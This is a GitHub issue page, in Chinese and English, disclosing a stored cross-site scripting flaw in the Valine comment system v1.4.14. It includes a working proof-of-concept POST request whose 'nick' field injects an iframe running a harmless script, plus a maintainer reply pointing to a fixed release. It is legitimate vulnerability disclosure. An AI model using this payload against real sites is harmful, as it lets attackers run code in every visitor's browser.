Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Nick
如果您想报告错误,请提供以下信息 If you want to report a bug, please provide the following information:
Description
It is possible to embed an arbitrary HTML/JavaScript in the comment (using nick field), thus resulting in stored XSS (cross site scripting).
nick
可复现问题的步骤 The steps to reproduce.
POST /1.1/classes/Comment HTTP/1.1 Host: XXX.api.lncld.net User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0 Accept: */* Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: application/json;charset=UTF-8 Content-Length: 640 Origin: https://xxx.yyy.zzz
{ "comment": "Good! \n", "nick": "Alex\"</a><iframe width=1 height=1 srcdoc=\"<script>console.log('Stored XSS test passed');</script>\"", "mail": "", "link": "", "ua": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Fire-fox/82.0", "url": "/en/prepare/prepare/", "QQAvatar": "", "ip": "1.2.3.4", "insertedAt": { "__type": "Date", "iso": "2020-11-04T08:30:47.526Z" }, "ACL": { "*": { "read": true } } }
This malicious request adds new comment. The HTML-encoded value of srcdoc attribute in request is: <script>console.log('Stored XSS test passed');</script>
<script>console.log('Stored XSS test passed');</script>
The injected JavaScript executes on the vulnerable web-page for every visitor.
受影响的Valine版本、操作系统,以及浏览器信息 Which versions of Valine, and which browser / OS are affected by this issue?
Valine: v1.4.14 All systems and browsers
The text was updated successfully, but these errors were encountered:
收到,将在下个版本修复,感谢反馈~
Sorry, something went wrong.
@xCss , Hi! I would like to point out that the official valine web-site https://valine.js.org is also vulnerable to this stored XSS attack
https://github.com/xCss/Valine/releases/tag/v1.4.15
No branches or pull requests
如果您想报告错误,请提供以下信息 If you want to report a bug, please provide the following information:
Description
It is possible to embed an arbitrary HTML/JavaScript in the comment (using
nickfield), thus resulting in stored XSS (cross site scripting).可复现问题的步骤 The steps to reproduce.
{ "comment": "Good! \n", "nick": "Alex\"</a><iframe width=1 height=1 srcdoc=\"<script>console.log('Stored XSS test passed');</script>\"", "mail": "", "link": "", "ua": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Fire-fox/82.0", "url": "/en/prepare/prepare/", "QQAvatar": "", "ip": "1.2.3.4", "insertedAt": { "__type": "Date", "iso": "2020-11-04T08:30:47.526Z" }, "ACL": { "*": { "read": true } } }This malicious request adds new comment. The HTML-encoded value of srcdoc attribute in request is:
<script>console.log('Stored XSS test passed');</script>The injected JavaScript executes on the vulnerable web-page for every visitor.
受影响的Valine版本、操作系统,以及浏览器信息 Which versions of Valine, and which browser / OS are affected by this issue?
Valine: v1.4.14
All systems and browsers
The text was updated successfully, but these errors were encountered: